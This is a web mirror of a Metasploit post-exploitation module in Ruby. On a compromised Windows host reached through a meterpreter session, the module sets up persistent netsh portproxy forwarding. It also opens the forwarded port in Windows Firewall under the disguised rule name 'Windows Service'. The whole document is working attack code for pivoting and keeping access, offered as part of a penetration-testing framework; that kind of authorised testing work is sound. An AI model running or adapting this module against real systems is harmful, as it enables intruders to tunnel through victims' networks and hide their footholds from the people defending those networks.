Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/portproxy.rb
19851 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Windows::Priv

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Windows Manage Set Port Forwarding With PortProxy',

14
        'Description' => %q{

15
          This module uses the PortProxy interface from netsh to set up

16
          port forwarding persistently (even after reboot). PortProxy

17
          supports TCP IPv4 and IPv6 connections.

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],

21
        'Platform' => 'win',

22
        'SessionTypes' => [ 'meterpreter' ],

23
        'Notes' => {

24
          'Stability' => [CRASH_SAFE],

25
          'SideEffects' => [CONFIG_CHANGES],

26
          'Reliability' => []

27
        }

28
      )

29
    )

30


31
    register_options(

32
      [

33
        OptAddress.new('LOCAL_ADDRESS', [ true, 'IPv4/IPv6 address to which to listen.']),

34
        OptAddress.new('CONNECT_ADDRESS', [ true, 'IPv4/IPv6 address to which to connect.']),

35
        OptPort.new('CONNECT_PORT', [ true, 'Port number to which to connect.']),

36
        OptPort.new('LOCAL_PORT', [ true, 'Port number to which to listen.']),

37
        OptBool.new('IPV6_XP', [ true, 'Install IPv6 on Windows XP (needed for v4tov4).', true]),

38
        OptEnum.new('TYPE', [ true, 'Type of forwarding', 'v4tov4', ['v4tov4', 'v6tov6', 'v6tov4', 'v4tov6']])

39
      ]

40
    )

41
  end

42


43
  def run

44
    if !is_admin?

45
      print_error("You don't have enough privileges. Try getsystem.")

46
      return

47
    end

48


49
    # Due to a bug in Windows XP you need to install IPv6

50
    # http://support.microsoft.com/kb/555744/en-us

51
    version = get_version_info

52
    if version.build_number.between?(Msf::WindowsVersion::XP_SP0, Msf::WindowsVersion::XP_SP2) && !check_ipv6

53
      return

54
    end

55


56
    return unless enable_portproxy

57


58
    fw_enable_ports

59
  end

60


61
  def enable_portproxy

62
    rtable = Rex::Text::Table.new(

63
      'Header' => 'Port Forwarding Table',

64
      'Indent' => 3,

65
      'Columns' => ['LOCAL IP', 'LOCAL PORT', 'REMOTE IP', 'REMOTE PORT']

66
    )

67


68
    print_status('Setting PortProxy ...')

69
    netsh_args = 'interface portproxy '

70
    netsh_args << "add #{datastore['TYPE']} "

71
    netsh_args << "listenport=#{datastore['LOCAL_PORT']} "

72
    netsh_args << "listenaddress=#{datastore['LOCAL_ADDRESS']} "

73
    netsh_args << "connectport=#{datastore['CONNECT_PORT']} "

74
    netsh_args << "connectaddress=#{datastore['CONNECT_ADDRESS']}"

75
    output = cmd_exec('netsh', netsh_args)

76
    if output.size > 2

77
      print_error('Setup error. Verify parameters and syntax.')

78
      return false

79
    else

80
      print_good('PortProxy added.')

81
    end

82


83
    output = cmd_exec('netsh', 'interface portproxy show all')

84
    output.each_line do |l|

85
      rtable << l.split(' ') if l.strip =~ /^[0-9]|\*/

86
    end

87
    print_status(rtable.to_s)

88
    return true

89
  end

90


91
  def ipv6_installed

92
    output = cmd_exec('netsh', 'interface ipv6 show interface')

93
    if output.lines.count > 2

94
      return true

95
    else

96
      return false

97
    end

98
  end

99


100
  def check_ipv6

101
    if ipv6_installed

102
      print_status('IPv6 is already installed.')

103
      return true

104
    elsif !datastore['IPV6_XP']

105
      print_error('IPv6 is not installed. You need IPv6 to use portproxy.')

106
      print_status('IPv6 can be installed with "netsh interface ipv6 install"')

107
      return false

108
    else

109
      print_status('Installing IPv6... can take a little long')

110
      cmd_exec('netsh', 'interface ipv6 install', 120)

111
      if !ipv6_installed

112
        print_error('IPv6 was not successfully installed. Run it again.')

113
        return false

114
      end

115
      print_good('IPv6 was successfully installed.')

116
      return true

117
    end

118
  end

119


120
  def fw_enable_ports

121
    print_status("Setting port #{datastore['LOCAL_PORT']} in Windows Firewall ...")

122
    version = get_version_info

123
    if version.build_number >= Msf::WindowsVersion::Vista_SP0

124
      cmd_exec('netsh', "advfirewall firewall add rule name=\"Windows Service\" dir=in protocol=TCP action=allow localport=\"#{datastore['LOCAL_PORT']}\"")

125
    else

126
      cmd_exec('netsh', "firewall set portopening protocol=TCP port=\"#{datastore['LOCAL_PORT']}\"")

127
    end

128
    output = cmd_exec('netsh', 'firewall show state')

129


130
    if output =~ /^#{datastore['LOCAL_PORT']} /

131
      print_good('Port opened in Windows Firewall.')

132
    else

133
      print_error('There was an error enabling the port.')

134
    end

135
  end

136
end

137


138